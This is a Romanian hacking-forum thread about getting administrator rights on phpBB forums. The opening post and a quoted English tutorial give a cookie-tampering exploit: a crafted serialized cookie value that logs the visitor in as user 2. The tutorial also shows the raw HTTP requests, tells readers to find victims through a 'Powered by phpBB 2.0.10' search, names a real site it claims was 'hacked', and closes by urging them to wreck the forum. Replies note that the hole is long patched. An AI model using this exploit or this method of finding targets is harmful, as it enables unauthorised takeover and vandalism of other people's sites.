Jump to content
Dj-Xplood

Cum sa ai admin pe forum

Recommended Posts

Chestia asta no sa mearga cu toate forumurile.Sa zicem ca esti cu Mozilla Firefox dai la Tools,Clear Privat Data si bifezi Cokies acuma intri in forumu' care vrei sa ai admin dupaia inchizi mozilla,acuma cauti in calculator cokies (control panel,internet options,general,browsing history-settings,view objects) acuma trebe sa cauti asta: a%3A0%3A%7B%7D si trebuie modificata cu asta: a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

acuma intri din nou pe forum si gata esti admin

Daca am gresit pe undeva sami spuneti

Link to comment
Share on other sites

De ce n-ar comenta?..

1. Chiar e veche metoda, e in halul ala de patchuita, incat nici macar nu isi mai aduce aminte multa lume de existenta ei. Mergea pe phpBB daca bine imi amintesc.

2. Replica a fost tare, trebuie sa recunoastem :)

3. Poate mai sunt forumuri exploatate, dar, vorba lui Slick.. Documenteaza-te, si documenteaza-ne mai tare. Asta e exact ca si meteo la romani: maine poate ploua, poate e soare, temperaturile intre -40 si +40, poate-s nori, poate nu... E mult bambilici ;)

PS: De laudat intentia, dar.. research more ;)

Link to comment
Share on other sites

Ai gresit timpu , daca veneai acuma 1 -2 ani probabil era o chestie interesanta .

tare replica :))))))))))) :twisted:

venisi si u repede sa comentezi ceva...arata in plm ce sti sa faci daca esti bun nu sa dai un coment de tot kkt-ul

1. am ras la replica care a dat`o

2. am zis cumva ceva de tine?

3. astfel de limbaje nu sunt permise pe acest forum din cate am vazut , practic pe nici un forum , presimt ca esti un pusti de 13 ani care nu ai ce face, de ce simti nevoie sa folosesti "plm" , pari mai interesant? sfatul meu e sa iti revizuiesti limbajul si comportamentul daca vrei sa ai succes pe astfel de forum-uri , succes.

Link to comment
Share on other sites

Merge si aici pe RST??? :lol::lol: Despre ce-a zis devianc3 mergea pe phpbb 2.0.7(din cate imi aduc aminte),am cautat/incercat am gasit forumuri phpbb cu gramada doar ca toate erau upgradate adica erau 3.0..... si 2.0.7> nu am mai gasit niciunul....cat despre dj-xplood vezi ca daca ai copiat un tutorial (sau mai multe) nu te pune in "lumina" staff-ului sau a forumului.Incearca sa folosesti acel tutorial pt. a invata tu nu sa-l copiezi.Crede-ma ca daca il vei copia apoi vor fii membrii care nu vor intelege exact si vor pune intrebari despre el,iar tu din moment ce l-ai copiat nu vei stii sa raspunzi deci mai bine incearca si invata si asa vei avansa nu copiind de undeva -altundeva.Sper c-am fost de-ajutor :)

Link to comment
Share on other sites

Ba mai lasatima drk in pace am dat si yo primu meu tutorial aici pe forumu asta am aflat de chestia aia acu 3zile si am zis sami impart cunostintele cu voi dar voi faceti misto de mine al drk sa fiu care va mai ajuta datimi ban datimi warn ca numi mai pasa imi bag pl :!:

Chiar sunt GAY :D

Link to comment
Share on other sites

Merge si aici pe RST??? :lol::lol: Despre ce-a zis devianc3 mergea pe phpbb 2.0.7(din cate imi aduc aminte),am cautat/incercat am gasit forumuri phpbb cu gramada doar ca toate erau upgradate adica erau 3.0..... si 2.0.7> nu am mai gasit niciunul....cat despre dj-xplood vezi ca daca ai copiat un tutorial (sau mai multe) nu te pune in "lumina" staff-ului sau a forumului.Incearca sa folosesti acel tutorial pt. a invata tu nu sa-l copiezi.Crede-ma ca daca il vei copia apoi vor fii membrii care nu vor intelege exact si vor pune intrebari despre el,iar tu din moment ce l-ai copiat nu vei stii sa raspunzi deci mai bine incearca si invata si asa vei avansa nu copiind de undeva -altundeva.Sper c-am fost de-ajutor :)

taci ma din gura ce sti u daca lam copiat sau mi la zis un prieten :?:

Link to comment
Share on other sites

Nu conteaza de unde l-ai copiat,conteaza ca l-ai copiat + ca nu mai e valabila metoda.Foloseste si tu Search data viitoare si vezi daca s-a mai discutat subiectul sau nu.Te ia lumea la misto pt. ca nu te documentezi sa vezi daca mai e valabila metoda...Si nu imi zici tu mie sa tac din gura asa ca SHUT UP! :X

Link to comment
Share on other sites

banuiesc ca asta-i articolul original.



noxx-DLs.info


This tutorial was made for education use ONLY


I will show you the most easy way to hack the old phpBBs versions
2.0.10 and lower.


First off you need to things:
FireFox: [url]www.GetFireFox.com[/url]
Live HTTP Headers: [url]http://livehttpheaders.mozdev.org/installation.html[/url]
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 1:
Find a forum older than 2.0.13
Go to a Search like google.com or msn.com
Type in "Powered by phpBB 2.0.10"
Like so: [url]http://www.google.ca/search?hl=en&q=powered+by+phpbb+2.0.10&btnG=Google+Search&meta=[/url]
Now i found: (at the moment i have already "hacked" this one.)
[url]http://www.simcraft.com/phpBB2[/url]
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 2:
Open the site you are going to hack in a new window.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 3:
Open "Live HTTP Headers" in Tools
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 4:
Refresh the page (the site you are going to hack)
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 5:
Now if you go to "Live HTTP Headers" you will see some text.
Scroll to the top you will see:

------------------------------
Host: simcraft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: [url]http://simcraft.com/phpBB2/index.php[/url]
Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=8167c889f5611d3d0e5272ec4d53d230
------------------------------
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 6:
Select the line:
Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=8167c889f5611d3d0e5272ec4d53d230
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 7:
Replace "a%3A0%3A%7B%7D" by "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"

also remove "; phpbb2mysql_sid=8167c889f5611d3d0e5272ec4d53d230"

and click "Replay..."

It sould look like this:

------------------------------
Host: simcraft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: [url]http://simcraft.com/phpBB2/index.php[/url]
Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
------------------------------
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 8:
Click "Replay"
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 9:
Now you will see "Go to Administration Panel" at the buttom of the page.

Now, sit down and fuck up the forum.

asta parca l-am luat de pe rst acuma 2 ani...

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...